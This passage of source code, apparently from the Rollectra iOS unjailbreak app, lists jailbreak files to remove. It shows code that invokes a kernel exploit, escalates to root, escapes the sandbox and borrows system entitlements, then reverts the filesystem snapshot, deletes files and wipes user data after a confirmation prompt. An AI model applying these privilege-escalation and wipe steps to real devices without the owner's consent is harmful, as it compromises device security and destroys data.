addObject:@"/usr/bin/sort"]; 420 | [array addObject:@"/usr/bin/ssh"]; 421 | [array addObject:@"/usr/bin/ssh-add"]; 422 | [array addObject:@"/usr/bin/ssh-agent"]; 423 | [array addObject:@"/usr/bin/ssh-keygen"]; 424 | [array addObject:@"/usr/bin/ssh-keyscan"]; 425 | [array addObject:@"/usr/bin/sw_vers"]; 426 | [array addObject:@"/usr/bin/tabs"]; 427 | [array addObject:@"/usr/bin/tar"]; 428 | [array addObject:@"/usr/bin/tic"]; 429 | [array addObject:@"/usr/bin/time"]; 430 | [array addObject:@"/usr/bin/toe"]; 431 | [array addObject:@"/usr/bin/tput"]; 432 | [array addObject:@"/usr/bin/tset"]; 433 | [array addObject:@"/usr/bin/uicache"]; 434 | [array addObject:@"/usr/bin/uiduid"]; 435 | [array addObject:@"/usr/bin/uiopen"]; 436 | [array addObject:@"/usr/bin/unlzma"]; 437 | [array addObject:@"/usr/bin/unxz"]; 438 | [array addObject:@"/usr/bin/update-alternatives"]; 439 | [array addObject:@"/usr/bin/updatedb"]; 440 | [array addObject:@"/usr/bin/which"]; 441 | [array addObject:@"/usr/bin/xargs"]; 442 | [array addObject:@"/usr/bin/xz"]; 443 | [array addObject:@"/usr/bin/xzcat"]; 444 | [array addObject:@"/usr/bin/xzcmp"]; 445 | [array addObject:@"/usr/bin/xzdec"]; 446 | [array addObject:@"/usr/bin/xzdiff"]; 447 | [array addObject:@"/usr/bin/xzegrep"]; 448 | [array addObject:@"/usr/bin/xzfgrep"]; 449 | [array addObject:@"/usr/bin/xzgrep"]; 450 | [array addObject:@"/usr/bin/xzless"]; 451 | [array addObject:@"/usr/bin/xzmore"]; 452 | [array addObject:@"/usr/games"]; 453 | [array addObject:@"/usr/include/curses.h"]; 454 | [array addObject:@"/usr/include/db_cxx.h"]; 455 | [array addObject:@"/usr/include/db.h"]; 456 | [array addObject:@"/usr/include/dbsql.h"]; 457 | [array addObject:@"/usr/include/dpkg"]; 458 | [array addObject:@"/usr/include/eti.h"]; 459 | [array addObject:@"/usr/include/form.h"]; 460 | [array addObject:@"/usr/include/lzma"]; 461 | [array addObject:@"/usr/include/lzma.h"]; 462 | [array addObject:@"/usr/include/menu.h"]; 463 | [array addObject:@"/usr/include/nc_tparm.h"]; 464 | [array addObject:@"/usr/include/ncurses_dll.h"]; 465 | [array addObject:@"/usr/include/ncurses.h"]; 466 | [array addObject:@"/usr/include/ncursesw"]; 467 | [array addObject:@"/usr/include/openssl"]; 468 | [array addObject:@"/usr/include/panel.h"]; 469 | [array addObject:@"/usr/include/term_entry.h"]; 470 | [array addObject:@"/usr/include/term.h"]; 471 | [array addObject:@"/usr/include/termcap.h"]; 472 | [array addObject:@"/usr/include/tic.h"]; 473 | [array addObject:@"/usr/include/unctrl.h"]; 474 | [array addObject:@"/usr/lib/apt"]; 475 | [array addObject:@"/usr/lib/bash"]; 476 | [array addObject:@"/usr/lib/engines"]; 477 | [array addObject:@"/usr/lib/libapt-inst.2.0.0.dylib"]; 478 | [array addObject:@"/usr/lib/libapt-inst.2.0.dylib"]; 479 | [array addObject:@"/usr/lib/libapt-inst.dylib"]; 480 | [array addObject:@"/usr/lib/libapt-pkg.5.0.1.dylib"]; 481 | [array addObject:@"/usr/lib/libapt-pkg.5.0.dylib"]; 482 | [array addObject:@"/usr/lib/libapt-pkg.dylib"]; 483 | [array addObject:@"/usr/lib/libapt-private.0.0.0.dylib"]; 484 | [array addObject:@"/usr/lib/libapt-private.0.0.dylib"]; 485 | [array addObject:@"/usr/lib/libcrypto.1.0.0.dylib"]; 486 | [array addObject:@"/usr/lib/libcrypto.a"]; 487 | [array addObject:@"/usr/lib/libcrypto.dylib"]; 488 | [array addObject:@"/usr/lib/libdb_sql-6.2.dylib"]; 489 | [array addObject:@"/usr/lib/libdb_sql-6.dylib"]; 490 | [array addObject:@"/usr/lib/libdb_sql.dylib"]; 491 | [array addObject:@"/usr/lib/libdb-6.2.dylib"]; 492 | [array addObject:@"/usr/lib/libdb-6.dylib"]; 493 | [array addObject:@"/usr/lib/libdb.dylib"]; 494 | [array addObject:@"/usr/lib/libdpkg.a"]; 495 | [array addObject:@"/usr/lib/libdpkg.la"]; 496 | [array addObject:@"/usr/lib/liblzma.a"]; 497 | [array addObject:@"/usr/lib/liblzma.la"]; 498 | [array addObject:@"/usr/lib/libssl.1.0.0.dylib"]; 499 | [array addObject:@"/usr/lib/libssl.a"]; 500 | [array addObject:@"/usr/lib/libssl.dylib"]; 501 | [array addObject:@"/usr/lib/pkgconfig"]; 502 | [array addObject:@"/usr/lib/ssl"]; 503 | [array addObject:@"/usr/lib/terminfo"]; 504 | [array addObject:@"/usr/libexec/apt"]; 505 | [array addObject:@"/usr/libexec/bigram"]; 506 | [array addObject:@"/usr/libexec/code"]; 507 | [array addObject:@"/usr/libexec/cydia"]; 508 | [array addObject:@"/usr/libexec/dpkg"]; 509 | [array addObject:@"/usr/libexec/frcode"]; 510 | [array addObject:@"/usr/libexec/gnupg"]; 511 | [array addObject:@"/usr/libexec/rmt"]; 512 | [array addObject:@"/usr/libexec/sftp-server"]; 513 | [array addObject:@"/usr/libexec/ssh-keysign"]; 514 | [array addObject:@"/usr/libexec/ssh-pkcs11-helper"]; 515 | [array addObject:@"/usr/local/lib"]; 516 | [array addObject:@"/usr/sbin/ac"]; 517 | [array addObject:@"/usr/sbin/accton"]; 518 | [array addObject:@"/usr/sbin/halt"]; 519 | [array addObject:@"/usr/sbin/iostat"]; 520 | [array addObject:@"/usr/sbin/mkfile"]; 521 | [array addObject:@"/usr/sbin/pwd_mkdb"]; 522 | [array addObject:@"/usr/sbin/reboot"]; 523 | [array addObject:@"/usr/sbin/sshd"]; 524 | [array addObject:@"/usr/sbin/startupfiletool"]; 525 | [array addObject:@"/usr/sbin/sysctl"]; 526 | [array addObject:@"/usr/sbin/vifs"]; 527 | [array addObject:@"/usr/sbin/vipw"]; 528 | [array addObject:@"/usr/sbin/zdump"]; 529 | [array addObject:@"/usr/sbin/zic"]; 530 | [array addObject:@"/usr/share/bigboss"]; 531 | [array addObject:@"/usr/share/dict"]; 532 | [array addObject:@"/usr/share/dpkg"]; 533 | [array addObject:@"/usr/share/gnupg"]; 534 | [array addObject:@"/usr/share/tabset"]; 535 | [array addObject:@"/usr/share/terminfo"]; 536 | // Potential Manual Files 537 | [array addObject:@"/bin/bash"]; 538 | [array addObject:@"/authorize.sh"]; 539 | [array addObject:@"/Applications/jjjj.app"]; 540 | [array addObject:@"/Applications/Extender.app"]; 541 | [array addObject:@"/Applications/GBA4iOS.app"]; 542 | [array addObject:@"/Applications/Filza.app"]; 543 | [array addObject:@"/Library/dpkg"]; 544 | [array addObject:@"/Library/Cylinder"]; 545 | [array addObject:@"/Library/LaunchDaemons"]; 546 | [array addObject:@"/Library/Zeppelin"]; 547 | [array addObject:@"/etc/alternatives"]; 548 | [array addObject:@"/etc/apt"]; 549 | [array addObject:@"/etc/dpkg"]; 550 | [array addObject:@"/etc/dropbear"]; 551 | [array addObject:@"/etc/pam.d"]; 552 | [array addObject:@"/etc/profile.d"]; 553 | [array addObject:@"/etc/ssh"]; 554 | [array addObject:@"/usr/include"]; 555 | [array addObject:@"/usr/lib/apt"]; 556 | [array addObject:@"/usr/lib/dpkg"]; 557 | [array addObject:@"/usr/lib/pam"]; 558 | [array addObject:@"/usr/lib/pkgconfig"]; 559 | [array addObject:@"/usr/lib/cycript0.9"]; 560 | [array addObject:@"/usr/libexec/cydia"]; 561 | [array addObject:@"/usr/libexec/gnupg"]; 562 | [array addObject:@"/usr/share/bigboss"]; 563 | [array addObject:@"/usr/share/dpkg"]; 564 | [array addObject:@"/usr/share/gnupg"]; 565 | [array addObject:@"/usr/share/tabset"]; 566 | [array addObject:@"/private/var/cache/apt"]; 567 | [array addObject:@"/private/var/db/stash"]; 568 | [array addObject:@"/private/var/lib/apt"]; 569 | [array addObject:@"/private/var/lib/dpkg"]; 570 | [array addObject:@"/private/var/stash"]; 571 | [array addObject:@"/private/var/tweak"]; 572 | // Electra Beta Bootstrap 573 | [array addObject:@"/Applications/Anemone.app"]; 574 | [array addObject:@"/Applications/SafeMode.app"]; 575 | [array addObject:@"/usr/lib/SBInject.dylib"]; 576 | [array addObject:@"/usr/lib/SBInject"]; 577 | [array addObject:@"/usr/lib/libsubstitute.0.dylib"]; 578 | [array addObject:@"/usr/lib/libsubstitute.dylib"]; 579 | [array addObject:@"/usr/lib/libsubstrate.dylib"]; 580 | [array addObject:@"/usr/lib/libjailbreak.dylib"]; 581 | [array addObject:@"/usr/bin/recache"]; 582 | [array addObject:@"/usr/bin/killall"]; 583 | [array addObject:@"/usr/share/terminfo"]; 584 | [array addObject:@"/usr/libexec/sftp-server"]; 585 | [array addObject:@"/usr/lib/SBInject.dylib"]; 586 | [array addObject:@"/Library/Frameworks"]; 587 | [array addObject:@"/System/Library/Themes"]; 588 | [array addObject:@"/bootstrap"]; 589 | [array addObject:@"/Library/Themes"]; 590 | [array addObject:@"/usr/lib/SBInject.dylib"]; 591 | [array addObject:@"/Library/MobileSubstrate"]; 592 | // Filza 593 | [array addObject:@"/Applications/Filza.app"]; 594 | [array addObject:@"/private/var/root/Library/Filza"]; 595 | [array addObject:@"/private/var/root/Library/Preferences/com.tigisoftware.Filza.plist"]; 596 | [array addObject:@"/private/var/root/Library/Caches/com.tigisoftware.Filza"]; 597 | [array addObject:@"/private/var/mobile/Library/Filza/"]; 598 | [array addObject:@"/private/var/mobile/Library/Filza/.Trash"]; 599 | [array addObject:@"/private/var/mobile/Library/Filza/.Trash.metadata"]; 600 | [array addObject:@"/private/var/mobile/Library/Preferences/com.tigisoftware.Filza.plist"]; 601 | // Liberios 602 | [array addObject:@"/etc/motd"]; 603 | [array addObject:@"/.cydia_no_stash"]; 604 | [array addObject:@"/Applications/Cydia.app"]; 605 | [array addObject:@"/usr/share/terminfo"]; 606 | [array addObject:@"/usr/local/bin"]; 607 | [array addObject:@"/usr/local/lib"]; 608 | [array addObject:@"/bin/zsh"]; 609 | [array addObject:@"/etc/profile"]; 610 | [array addObject:@"/etc/zshrc"]; 611 | [array addObject:@"/usr/bin/scp"]; 612 | [array addObject:@"/jb"]; 613 | // ToPanga 614 | [array addObject:@"/etc/alternatives"]; 615 | [array addObject:@"/etc/dpkg"]; 616 | [array addObject:@"/etc/dropbear"]; 617 | [array addObject:@"/etc/profile"]; 618 | [array addObject:@"/etc/zshrc"]; 619 | [array addObject:@"/usr/bin/apt"]; 620 | [array addObject:@"/usr/bin/apt-get"]; 621 | [array addObject:@"/usr/bin/cycc"]; 622 | [array addObject:@"/usr/bin/cycript"]; 623 | [array addObject:@"/usr/bin/cynject"]; 624 | [array addObject:@"/usr/bin/dpkg"]; 625 | [array addObject:@"/usr/bin/dpkg-deb"]; 626 | [array addObject:@"/usr/bin/dpkg-divert"]; 627 | [array addObject:@"/usr/bin/dpkg-maintscript-helper"]; 628 | [array addObject:@"/usr/bin/dpkg-query"]; 629 | [array addObject:@"/usr/bin/dpkg-split"]; 630 | [array addObject:@"/usr/bin/dpkg-statoverride"]; 631 | [array addObject:@"/usr/bin/dpkg-trigger"]; 632 | [array addObject:@"/usr/bin/dselect"]; 633 | [array addObject:@"/usr/bin/env"]; 634 | [array addObject:@"/usr/bin/gnutar"]; 635 | [array addObject:@"/usr/bin/gtar"]; 636 | [array addObject:@"/usr/bin/uicache"]; 637 | [array addObject:@"/usr/bin/update-alternatives"]; 638 | [array addObject:@"/usr/include/dpkg"]; 639 | [array addObject:@"/usr/include/substrate.h"]; 640 | [array addObject:@"/usr/lib/apt"]; 641 | [array addObject:@"/usr/lib/cycript0.9"]; 642 | [array addObject:@"/usr/lib/dpkg"]; 643 | [array addObject:@"/usr/lib/libapt-inst.dylib"]; 644 | [array addObject:@"/usr/lib/libapt-pkg.dylib"]; 645 | [array addObject:@"/usr/lib/libcrypto.1.0.0.dylib"]; 646 | [array addObject:@"/usr/lib/libcurl.4.dylib"]; 647 | [array addObject:@"/usr/lib/libcycript.0.dylib"]; 648 | [array addObject:@"/usr/lib/libcycript.cy"]; 649 | [array addObject:@"/usr/lib/libcycript.db"]; 650 | [array addObject:@"/usr/lib/libcycript.dylib"]; 651 | [array addObject:@"/usr/lib/libcycript.jar"]; 652 | [array addObject:@"/usr/lib/libdpkg.a"]; 653 | [array addObject:@"/usr/lib/libdpkg.la"]; 654 | [array addObject:@"/usr/lib/libssl.1.0.0.dylib"]; 655 | [array addObject:@"/usr/lib/libsubstrate.0.dylib"]; 656 | [array addObject:@"/usr/lib/libsubstrate.dylib"]; 657 | [array addObject:@"/usr/lib/pkgconfig"]; 658 | [array addObject:@"/usr/share/dpkg"]; 659 | [array addObject:@"/usr/local/bin"]; 660 | [array addObject:@"/usr/local/lib"]; 661 | [array addObject:@"/usr/libexec/cydia"]; 662 | [array addObject:@"/usr/libexec/MSUnrestrictProcess"]; 663 | [array addObject:@"/usr/libexec/substrate"]; 664 | [array addObject:@"/usr/sbin/start-stop-daemon"]; 665 | [array addObject:@"/private/var/lib"]; 666 | [array addObject:@"/bin/bash"]; 667 | [array addObject:@"/bin/bzip2"]; 668 | [array addObject:@"/bin/bzip2_64"]; 669 | [array addObject:@"/bin/cat"]; 670 | [array addObject:@"/bin/chmod"]; 671 | [array addObject:@"/bin/chown"]; 672 | [array addObject:@"/bin/cp"]; 673 | [array addObject:@"/bin/date"]; 674 | [array addObject:@"/bin/dd"]; 675 | [array addObject:@"/bin/hostname"]; 676 | [array addObject:@"/bin/kill"]; 677 | [array addObject:@"/bin/launchctl"]; 678 | [array addObject:@"/bin/ln"]; 679 | [array addObject:@"/bin/ls"]; 680 | [array addObject:@"/bin/mkdir"]; 681 | [array addObject:@"/bin/mv"]; 682 | [array addObject:@"/bin/pwd"]; 683 | [array addObject:@"/bin/rm"]; 684 | [array addObject:@"/bin/rmdir"]; 685 | [array addObject:@"/bin/sed"]; 686 | [array addObject:@"/bin/sh"]; 687 | [array addObject:@"/bin/sleep"]; 688 | [array addObject:@"/bin/stty"]; 689 | [array addObject:@"/bin/zsh"]; 690 | [array addObject:@"/Applications/Cydia.app"]; 691 | [array addObject:@"/Library/Frameworks"]; 692 | [array addObject:@"/Library/MobileSubstrate"]; 693 | [array addObject:@"/Library/test_inject_springboard.cy"]; 694 | return array; 695 | } 696 | 697 | #ifdef WANT_CYDIA 698 | void unjailbreak(int shouldEraseUserData) 699 | #else /* !WANT_CYDIA */ 700 | void unjailbreak(mach_port_t tfp0, uint64_t kernel_base, int shouldEraseUserData) 701 | #endif /* !WANT_CYDIA */ 702 | { 703 | // Initialize variables. 704 | int rv = 0; 705 | #ifndef WANT_CYDIA 706 | uint64_t myOriginalCredAddr = 0; 707 | #endif /* WANT_CYDIA */ 708 | NSMutableDictionary *md = nil; 709 | NSArray *cleanUpFileList = nil; 710 | 711 | #ifndef WANT_CYDIA 712 | // Initialize QiLin. 713 | LOG("%@", NSLocalizedString(@"Initializing QiLin...", nil)); 714 | rv = initQiLin(tfp0, kernel_base); 715 | LOG("rv: " "%d" "\n", rv); 716 | _assert(rv == 0); 717 | LOG("%@", NSLocalizedString(@"Successfully initialized QiLin.", nil)); 718 | #endif /* WANT_CYDIA */ 719 | 720 | #ifndef WANT_CYDIA 721 | // Rootify myself. 722 | LOG("%@", NSLocalizedString(@"Rootifying myself...", nil)); 723 | rv = rootifyMe(); 724 | LOG("rv: " "%d" "\n", rv); 725 | _assert(rv == 0); 726 | LOG("%@", NSLocalizedString(@"Successfully rootified myself.", nil)); 727 | #endif /* WANT_CYDIA */ 728 | 729 | #ifndef WANT_CYDIA 730 | // Escape Sandbox. 731 | LOG("%@", NSLocalizedString(@"Escaping Sandbox...", nil)); 732 | myOriginalCredAddr = ShaiHuludMe(0); 733 | LOG("myOriginalCredAddr: " ADDR "\n", myOriginalCredAddr); 734 | LOG("%@", NSLocalizedString(@"Successfully escaped Sandbox.", nil)); 735 | #endif /* WANT_CYDIA */ 736 | 737 | #ifndef WANT_CYDIA 738 | // Write a test file. 739 | 740 | LOG("%@", NSLocalizedString(@"Writing a test file...", nil)); 741 | if (!access("/var/mobile/test.txt", F_OK)) { 742 | rv = unlink("/var/mobile/test.txt"); 743 | LOG("rv: " "%d" "\n", rv); 744 | _assert(rv == 0); 745 | } 746 | rv = fclose(fopen("/var/mobile/test.txt", "w+")); 747 | LOG("rv: " "%d" "\n", rv); 748 | _assert(rv == 0); 749 | rv = unlink("/var/mobile/test.txt"); 750 | LOG("rv: " "%d" "\n", rv); 751 | _assert(rv == 0); 752 | LOG("%@", NSLocalizedString(@"Successfully wrote a test file.", nil)); 753 | #endif /* WANT_CYDIA */ 754 | 755 | #ifndef WANT_CYDIA 756 | // Borrow entitlements from fsck_apfs. 757 | 758 | LOG("%@", NSLocalizedString(@"Borrowing entitlements from fsck_apfs...", nil)); 759 | borrowEntitlementsFromDonor("/sbin/fsck_apfs", NULL); 760 | LOG("%@", NSLocalizedString(@"Successfully borrowed entitlements from fsck_apfs.", nil)); 761 | 762 | // We now have fs_snapshot_rename. 763 | #endif /* WANT_CYDIA */ 764 | 765 | // Revert to the system snapshot. 766 | LOG("%@", NSLocalizedString(@"Reverting to the system snapshot...", nil)); 767 | rv = fs_snapshot_rename(open("/", O_RDONLY, 0), "orig-fs", systemSnapshot(copyBootHash()), 0); 768 | LOG("rv: " "%d" "\n", rv); 769 | _assert(rv == 0); 770 | LOG("%@", NSLocalizedString(@"Successfully put the system snapshot in place, it should revert on the next mount.", nil)); 771 | 772 | md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist"]; 773 | _assert(md); 774 | md[@"SBShowNonDefaultSystemApps"] = @(NO); 775 | [md writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; 776 | 777 | // Revert to the system snapshot. 778 | LOG("%@", NSLocalizedString(@"Reverting to the system snapshot...", nil)); 779 | extern int SBDataReset(mach_port_t, int); 780 | extern mach_port_t SBSSpringBoardServerPort(void); 781 | mach_port_t SpringBoardServerPort = SBSSpringBoardServerPort(); 782 | _assert(MACH_PORT_VALID(SpringBoardServerPort)); 783 | #ifdef WANT_CYDIA 784 | if (kCFCoreFoundationVersionNumber < 1452.23) { 785 | if (access("/var/MobileSoftwareUpdate/mnt1", F_OK)) { 786 | rv = mkdir("/var/MobileSoftwareUpdate/mnt1", 0755); 787 | LOG("rv: " "%d" "\n", rv); 788 | _assert(rv == 0); 789 | } 790 | if (snapshot_check("/", "electra-prejailbreak") == 1) { 791 | rv = easyPosixSpawn([NSURL fileURLWithPath:@"/sbin/mount_apfs"], @[@"-s", @"electra-prejailbreak", @"/", @"/var/MobileSoftwareUpdate/mnt1"]); 792 | } else if (snapshot_check("/", "orig-fs") == 1) { 793 | rv = easyPosixSpawn([NSURL fileURLWithPath:@"/sbin/mount_apfs"], @[@"-s", @"orig-fs", @"/", @"/var/MobileSoftwareUpdate/mnt1"]); 794 | } else { 795 | rv = easyPosixSpawn([NSURL fileURLWithPath:@"/sbin/mount_apfs"], @[@"-s", [NSString stringWithFormat:@"%s", systemSnapshot(copyBootHash())], @"/", @"/var/MobileSoftwareUpdate/mnt1"]); 796 | } 797 | LOG("rv: " "%d" "\n", rv); 798 | _assert(rv == 0); 799 | rv = waitForFile("/var/MobileSoftwareUpdate/mnt1/sbin/launchd"); 800 | LOG("rv: " "%d" "\n", rv); 801 | _assert(rv == 0); 802 | rv = easyPosixSpawn([NSURL fileURLWithPath:@"/usr/bin/rsync"], @[@"-vaxcH", @"--progress", @"--delete-after", @"/var/MobileSoftwareUpdate/mnt1/.", @"/"]); 803 | LOG("rv: " "%d" "\n", rv); 804 | _assert(rv == 0); 805 | } 806 | else { 807 | #endif /* !WANT_CYDIA */ 808 | #ifdef WANT_CYDIA 809 | rv = fs_snapshot_rename(open("/", O_RDONLY, 0), "orig-fs", systemSnapshot(copyBootHash()), 0); 810 | LOG("rv: " "%d" "\n", rv); 811 | _assert(rv == 0); 812 | } 813 | #endif /* !WANT_CYDIA */ 814 | LOG("%@", NSLocalizedString(@"Successfully put the system snapshot in place, it should revert on the next mount.", nil)); 815 | 816 | // Clean up. 817 | 818 | LOG("%@", NSLocalizedString(@"Cleaning up...", nil)); 819 | cleanUpFileList = getCleanUpFileList(); 820 | _assert(cleanUpFileList != nil); 821 | for (NSString *fileName in cleanUpFileList) { 822 | if (!access([fileName UTF8String], F_OK)) { 823 | _assert([[NSFileManager defaultManager] removeItemAtPath:fileName error:nil] == 1); 824 | } 825 | } 826 | LOG("%@", NSLocalizedString(@"Successfully cleaned up.", nil)); 827 | 828 | #ifndef WANT_CYDIA 829 | // Entitle myself. 830 | LOG("%@", NSLocalizedString(@"Entitling myself...", nil)); 831 | rv = entitleMe("\tplatform-application\n" 832 | "\t\n" 833 | "\tcom.apple.springboard.wipedevice\n" 834 | "\t"); 835 | LOG("rv: " "%d" "\n", rv); 836 | _assert(rv == 0); 837 | LOG("%@", NSLocalizedString(@"Successfully entitled myself.", nil)); 838 | #endif /* WANT_CYDIA */ 839 | 840 | // Erase user data. 841 | LOG("%@", NSLocalizedString(@"Erasing user data...", nil)); 842 | rv = SBDataReset(SpringBoardServerPort, shouldEraseUserData ? 5 : 1); 843 | LOG("rv: " "%d" "\n", rv); 844 | _assert(rv == 0); 845 | rv = reboot(0x400); 846 | LOG("rv: " "%d" "\n", rv); 847 | _assert(rv == 0); 848 | LOG("%@", NSLocalizedString(@"Successfully erased user data.", nil)); 849 | } 850 | 851 | - (IBAction)tappedOnUnjailbreak:(id)sender { 852 | dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), ^{ 853 | UIAlertController *alertController = [UIAlertController alertControllerWithTitle:NSLocalizedString(@"Confirmation", nil) message:NSLocalizedString(@"Are you sure want to erase all data and unjailbreak the device?", nil) preferredStyle:UIAlertControllerStyleAlert]; 854 | UIAlertAction *OK = [UIAlertAction actionWithTitle:NSLocalizedString(@"Erase All", nil) style:UIAlertActionStyleDestructive handler:^(UIAlertAction * _Nonnull action) { 855 | dispatch_async(dispatch_get_main_queue(), ^{ 856 | [self.unjailbreakButton setEnabled:NO]; 857 | }); 858 | dispatch_async(dispatch_get_main_queue(), ^{ 859 | [self.unjailbreakButton setAlpha:0.5]; 860 | }); 861 | dispatch_async(dispatch_get_main_queue(), ^{ 862 | [self.resetUserDataSwitch setEnabled:NO]; 863 | }); 864 | #ifndef WANT_CYDIA 865 | dispatch_async(dispatch_get_main_queue(), ^{ 866 | [self.unjailbreakButton setTitle:NSLocalizedString(@"Exploiting...", nil) forState:UIControlStateDisabled]; 867 | }); 868 | #endif /* WANT_CYDIA */ 869 | #ifndef WANT_CYDIA 870 | // Initialize kernel exploit. 871 | LOG("%@", NSLocalizedString(@"Initializing kernel exploit...", nil)); 872 | vfs_sploit(); 873 | #endif /* WANT_CYDIA */ 874 | #ifndef WANT_CYDIA 875 | // Validate TFP0. 876 | LOG("%@", NSLocalizedString(@"Validating TFP0...", nil)); 877 | _assert(MACH_PORT_VALID(tfp0)); 878 | LOG("%@", NSLocalizedString(@"Successfully validated TFP0.", nil)); 879 | #endif /* WANT_CYDIA */ 880 | dispatch_async(dispatch_get_main_queue(), ^{ 881 | [self.unjailbreakButton setTitle:NSLocalizedString(@"Unjailbreaking...", nil) forState:UIControlStateDisabled]; 882 | }); 883 | dispatch_async(dispatch_get_main_queue(), ^{ 884 | #ifdef WANT_CYDIA 885 | unjailbreak(self.resetUserDataSwitch.isOn); 886 | #else /* !WANT_CYDIA */ 887 | unjailbreak(tfp0, (uint64_t)get_kernel_base(tfp0), self.resetUserDataSwitch.isOn); 888 | #endif /* !WANT_CYDIA */ 889 | }); 890 | dispatch_async(dispatch_get_main_queue(), ^{ 891 | [self.unjailbreakButton setTitle:NSLocalizedString(@"Failed, reboot.", nil) forState:UIControlStateDisabled]; 892 | }); 893 | }]; 894 | UIAlertAction *Cancel = [UIAlertAction actionWithTitle:NSLocalizedString(@"Cancel", nil) style:UIAlertActionStyleDefault handler:nil]; 895 | [alertController addAction:OK]; 896 | [alertController addAction:Cancel]; 897 | [alertController setPreferredAction:Cancel]; 898 | [self presentViewController:alertController animated:YES completion:nil]; 899 | }); 900 | } 901 | 902 | + (NSURL *)getURLForUserName:(NSString *)userName { 903 | if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@"tweetbot://"]]) { 904 | return [NSURL URLWithString:[NSString stringWithFormat:@"tweetbot:///user_profile/%@", userName]]; 905 | } else if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@"twitterrific://"]]) { 906 | return [NSURL URLWithString:[NSString stringWithFormat:@"twitterrific:///profile?screen_name=%@", userName]]; 907 | } else if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@"tweetings://"]]) { 908 | return [NSURL URLWithString:[NSString stringWithFormat:@"tweetings:///user?screen_name=%@", userName]]; 909 | } else if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@"twitter://"]]) { 910 | return [NSURL URLWithString:[NSString stringWithFormat:@"https://mobile.twitter.com/%@", userName]]; 911 | } else { 912 | return [NSURL URLWithString:[NSString stringWithFormat:@"https://mobile.twitter.com/%@", userName]]; 913 | } 914 | } 915 | 916 | - (IBAction)tappedOnMe:(id)sender { 917 | [[UIApplication sharedApplication] openURL:[ViewController getURLForUserName:@"Pwn20wnd"] options:@{} completionHandler:nil]; 918 | } 919 | 920 | - (IBAction)tappedOnAesign_:(id)sender { 921 | [[UIApplication sharedApplication] openURL:[ViewController getURLForUserName:@"aesign_"] options:@{} completionHandler:nil]; 922 | } 923 | 924 | - (void)viewDidLoad { 925 | [super viewDidLoad]; 926 | // Do any additional setup after loading the view, typically from a nib. 927 | NSMutableAttributedString *str = [[NSMutableAttributedString alloc] initWithString:@"Revert all changes,\nfor a stock iOS."]; 928 | [str addAttribute:NSFontAttributeName value:[UIFont systemFontOfSize:19 weight:UIFontWeightBold] range:[@"Revert all changes,\nfor a stock iOS." rangeOfString:@"Revert "]]; 929 | [str addAttribute:NSFontAttributeName value:[UIFont systemFontOfSize:19 weight:UIFontWeightMedium] range:[@"Revert all changes,\nfor a stock iOS." rangeOfString:@"all changes,\nfor a stock "]]; 930 | [str addAttribute:NSFontAttributeName value:[UIFont systemFontOfSize:19 weight:UIFontWeightBold] range:[@"Revert all changes,\nfor a stock iOS." rangeOfString:@"iOS."]]; 931 | [self.infoLabel setAttributedText:str]; 932 | [self.unjailbreakButton addTarget:self action:@selector(tappedOnUnjailbreak:) forControlEvents:UIControlEventTouchUpInside]; 933 | [self.myButton addTarget:self action:@selector(tappedOnMe:) forControlEvents:UIControlEventTouchUpInside]; 934 | [self.aesign_Button addTarget:self action:@selector(tappedOnAesign_:) forControlEvents:UIControlEventTouchUpInside]; 935 | #ifndef WANT_CYDIA 936 | [self.QiLinLabel setHidden:NO]; 937 | #endif /* WANT_CYDIA */ 938 | #ifdef WANT_CYDIA 939 | if (kCFCoreFoundationVersionNumber < 1443.00) { 940 | #else /* !WANT_CYDIA */ 941 | if (kCFCoreFoundationVersionNumber <= 1451.51) { 942 | #endif /* !WANT_CYDIA */ 943 | dispatch_async(dispatch_get_main_queue(), ^{ 944 | [self.unjailbreakButton setEnabled:NO]; 945 | [self.unjailbreakButton setTitle:NSLocalizedString(@"Incompatible version", nil) forState:UIControlStateDisabled]; 946 | [self.unjailbreakButton setAlpha:0.5]; 947 | [self.resetUserDataSwitch setEnabled:NO]; 948 | }); 949 | } 950 | } 951 | 952 | - (void)didReceiveMemoryWarning { 953 | [super didReceiveMemoryWarning]; 954 | // Dispose of any resources that can be recreated. 955 | } 956 | 957 | - (UIStatusBarStyle)preferredStatusBarStyle { 958 | return UIStatusBarStyleLightContent; 959 | } 960 | 961 | @end 962 | -------------------------------------------------------------------------------- /Rollectra/common.h: -------------------------------------------------------------------------------- 1 | #ifndef COMMON_H 2 | #define COMMON_H 3 | 4 | #include // uint*_t 5 | #include 6 | 7 | #define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(0) 8 | #ifdef __LP64__ 9 | # define ADDR "0x%016llx" 10 | # define MACH_HEADER_MAGIC MH_MAGIC_64 11 | # define MACH_LC_SEGMENT LC_SEGMENT_64 12 | typedef struct mach_header_64 mach_hdr_t; 13 | typedef struct segment_command_64 mach_seg_t; 14 | typedef uint64_t kptr_t; 15 | #else 16 | # define ADDR "0x%08x" 17 | # define MACH_HEADER_MAGIC MH_MAGIC 18 | # define MACH_LC_SEGMENT LC_SEGMENT 19 | typedef struct mach_header mach_hdr_t; 20 | typedef struct segment_command mach_seg_t; 21 | typedef uint32_t kptr_t; 22 | #endif 23 | typedef struct load_command mach_lc_t; 24 | 25 | #define _assert(test) do \ 26 | if (!(test)) { \ 27 | fprintf(stderr, "_assert(%d:%s)@%s:%u[%s]\n", errno, #test, __FILE__, __LINE__, __FUNCTION__); \ 28 | exit(-1); \ 29 | } \ 30 | while (false) 31 | 32 | #endif 33 | -------------------------------------------------------------------------------- /Rollectra/iokit.h: -------------------------------------------------------------------------------- 1 | #ifndef IOKIT_H 2 | #define IOKIT_H 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | typedef char io_name_t[128]; 9 | typedef char io_string_t[512]; 10 | typedef char io_struct_inband_t[4096]; 11 | typedef mach_port_t io_object_t; 12 | typedef io_object_t io_registry_entry_t; 13 | typedef io_object_t io_service_t; 14 | typedef io_object_t io_connect_t; 15 | typedef io_object_t io_iterator_t; 16 | 17 | #define IO_OBJECT_NULL (0) 18 | 19 | enum 20 | { 21 | kIOCFSerializeToBinary = 0x00000001U, 22 | }; 23 | 24 | enum 25 | { 26 | 